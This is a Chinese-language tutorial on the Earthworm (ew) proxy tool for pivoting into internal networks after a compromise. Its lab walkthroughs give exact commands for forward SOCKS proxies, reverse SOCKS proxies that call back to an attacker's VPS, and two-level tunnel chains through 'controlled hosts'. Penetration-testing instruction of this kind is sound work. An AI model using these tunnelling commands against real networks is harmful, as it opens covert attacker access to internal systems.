【內網—內網轉發】代理轉發軟件EW(Earthworm)
當前位置:點晴教程→知識管理交流
→『 技術文檔交流 』
文章目錄
一、環境準備:
二、工具:
三、概念:
四、學習目的:
五、ew(Earthworm)介紹:
六、ew(Earthworm)使用說明:
D:\ew>ew_for_Win.exe -h 版本:free1.2 ./xxx ([-options] [values])* 選項 : 例如:./xxx -s ssocksd -h -s 指定工作模式。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd 創建正向socks代理服務端,監聽在本地,直接把當前環境socks代理出去。rssocks 創建反向socks代理服務端rcsocks 反向socks代理客戶端lcx_tran 正向tcp端口轉發,監聽在本地lcx_slave 反向tcp轉發客戶端lcx_listen 反向tcp服務端-l listenport為服務器打開一個監聽端口。 -d refhost 設置反射主機地址。 -e refport 設置反射端口。 -f connhost 設置連接主機地址。 -g connport 設置連接端口。 -h help 顯示幫助文本,通過添加 -s 參數,您還可以查看更詳細的幫助。 -a about 顯示關于頁面 -v version 顯示版本。 -t usectime 設置超時的毫秒數。 默認的值為 1000 可以參考:http://rootkiter.com/EarthWorm/ 七、ew(Earthworm)正向代理(適用于被控服務器擁有一個公網IP):1. 場景:
2. 網絡拓撲圖:3. 說明:
4. 實驗過程:1、在被控主機使用ew打開一個監聽端口: ew_for_Win.exe -s ssocksd -l 6666 -s 指定工作模式 ssocksd 創建正向socks代理服務端,監聽在本地,直接把當前環境socks代理出去 -l listenport為服務器打開一個監聽端口
在進行測試時可以出現無法連通的現象,這時需要在【被控主機1】的ew命令行里面敲一下回車鍵: 4、在攻擊機上面連接被控服務器所在內網段的內網主機172.16.10.11: 八、ew(Earthworm)反向代理:1. 一級代理:1.1 場景:
1.2 網絡拓撲圖:1.3 說明:
1.4 實驗過程:1、在攻擊者的公網vps上添加轉接隧道,將6666收到的代理請求轉交給反連8888端口的被控服務器: ew_for_Win.exe -s rcsocks -l 6666 -e 8888 -s 指定工作模式 rcsocks 反向socks代理客戶端 -l listenport在代理客戶端設置監聽端口,將6666收到的 代理請求 轉交給反連8888端口的被控服務器。 -e refport設置反彈端口,用于接收被控服務器反彈過來的代理流量。 2、在被控服務器上啟動SOCKS v5服務并反彈到公網vps主機的8888端口 ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888 -s 指定工作模式 rssocks 創建反向socks代理服務端 -d refhost設置反彈主機地址(IP)。 -e refport設置反彈端口,反彈給公網vps開啟的8888端口。 3、在公網vps出現以下界面,說明連接成功: 4、使用proxifier代理工具客戶端連接公網vps上ew(Earthworm)的監聽的端口:
5、在攻擊機上面連接被控服務器所在內網段的內網主機172.16.10.11: 2. 二級代理(一):2.1 場景:
2.2 網絡拓撲圖:2.3 說明:
2.4 實驗過程:1、在公網vps添加轉接隧道,將6666端口收到的代理請求流量轉交給反連8888端口的被控主機: ew_for_Win.exe -s rcsocks -l 6666 -e 8888 -s 指定工作模式 rcsocks 反向socks代理客戶端 -l listenport在代理客戶端設置監聽端口,將6666收到的 代理請求 轉交給反連8888端口的被控服務器。 -e refport設置反彈端口,用于接收被控服務器反彈過來的代理流量。 2、在被控服主機1上啟動監聽本機端口9999,并將9999端口接收到的代理流量,轉發給攻擊者的公網vps的8888端口: ew_for_Win.exe -s lcx_tran -l 被控主機1本機端口 -f 攻擊者的公網vps_IP -g 8888ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888-s 指定工作模式 rssocks 創建反向socks代理服務端 -l listenport在被控主機1上設置監聽端口9999,將9999收到的 代理請求 轉交給攻擊者的公網vps的8888端口。 -f connhost 設置連接主機地址(IP)。 -g connport 設置連接端口。 這個命令的意思就是,把本機9999接收到的代理流量,轉發到攻擊者公網vps的192.168.100.152的8888端口上。 3、在被控主機2啟動SOCKS v5代理服務端,并反彈到被控主機1的8888端口 : ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999 -s 指定工作模式 rssocks 創建反向socks代理服務端 -d refhost設置反彈主機地址(IP)。 -e refport設置反彈端口,反彈給公網vps開啟的8888端口。 這個命令的意思就是在被控主機2啟動SOCKS v5代理服務端,把本機的代理流量反向代理到被控服務器1的9999端口。 4、使用proxifier代理工具客戶端連接公網vps上ew(Earthworm)的監聽的端口: 5、在攻擊機上面連接第二級內網被控主機所在內網段的內網主機10.1.1.2: 3. 二級代理(二):3.1 場景:
3.2 網絡拓撲圖:3.3 說明:
3.4 實驗過程:1、在攻擊者的公網vps添加轉接隧道,通過ew的lcx_listen模塊監聽本機的6666端口,把6666端口接受到的代理請求,轉發到反連8888端口的主機: ew_for_Win.exe -s lcx_listen -l 6666 -e 8888 -s 指定工作模式 lcx_listen 反向tcp服務端 -l listenport在代理客戶端設置監聽端口,將6666收到的 代理請求 轉交給反連8888端口的被控服務器。 -e refport設置反彈端口,用于接收被控服務器反彈過來的代理流量。 2、在內網環境2中的【被控主機2】上通過ssocksd模塊,開啟正向代理服務,通過ssocksd模塊監聽【被控主機2】本機的9999端口,通過正向代理,把外流量引向內網: ew_for_Win.exe -s ssocksd -l 9999 -s 指定工作模式 ssocksd 創建正向socks代理服務端,監聽在本地,直接把當前環境socks代理出去 -l listenport為服務器打開一個監聽端口 3、在內網環境1中的被控主機1運行以下命令,通過ew的lcx_slave流量轉發模塊,將正向連接到攻擊者的公網vps的8888端口,而獲得的代理請求流量,轉發給內網環境2的【被控主機2】,從而獲得內網環境2的內網流量: ew_for_Win.exe -s lcx_slave -d 攻擊者的公網vps_IP -e 8888 -f 處于2級內網的被控主機 -g 9999 ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999 -s 指定工作模式 lcx_slave 反向tcp轉發客戶端 -d refhost設置反彈主機地址(IP)。 -e refport設置反彈端口,反彈給公網vps開啟的8888端口 -f connhost 設置連接主機地址 -g connport 設置連接端口 4、使用proxifier代理工具客戶端連接公網vps上ew(Earthworm)的監聽的端口: 5、在攻擊機上面連接第二級內網被控主機所在內網段的內網主機10.1.1.2: 文章來源:https://blog.csdn.net/weixin_45588247/article/details/120238795 該文章在 2023/10/23 18:48:34 編輯過 |
關鍵字查詢
相關文章
正在查詢... |